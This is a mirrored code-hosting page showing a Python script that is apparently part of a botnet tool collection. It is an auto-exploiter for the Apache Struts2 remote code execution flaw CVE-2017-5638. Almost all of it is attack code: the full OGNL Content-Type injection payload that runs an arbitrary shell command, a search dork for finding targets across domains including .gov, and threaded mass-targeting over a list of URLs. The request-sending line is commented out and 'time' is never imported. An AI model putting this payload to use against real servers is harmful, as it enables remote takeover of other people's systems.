Mirrors
/
TL-BOTS
mirror of https://github.com/threatland/TL-BOTS
6
0
Fork 0
Code Issues Projects Releases Wiki Activity
TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.Apache.Struts/apache_struts_2_auto_exploi...

58 lines
2.1 KiB
Python
Raw Permalink Blame History

#!/usr/bin/python
# Modded Apache Struts2 RCE Exploit v2 CVE-2017-5638 AUTO EXPLOITER | By; LiGhT
# Dork: "site:com filetype:action"
# site example^: org,net,egu,gov,io,pw
import urllib2
import httplib
import sys, re, os
from threading import Thread
strutz = open(sys.argv[1], "r").readlines()
cmd = "" # COMMAND HERE Arch(s): x86, i686
def exploit(url, cmd):
#page = ''
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
url = ''.join(url)
if "http://" not in url:
url = "http://"+url
elif "https://" in url:
url = url.replace("https://", "http://")
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib2.Request(url, headers=headers)
print "\033[32mPayload Sent!"
#page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
pass
except KeyboardInterrupt:
pass
except Exception:
pass
#print "\n\033[35m%s"%(page)
for url in strutz:
try:
l33t = Thread(target=exploit, args=(url,cmd,))
l33t.start()
time.sleep(0.09)
except:
pass
Reference in New Issue View Git Blame Copy Permalink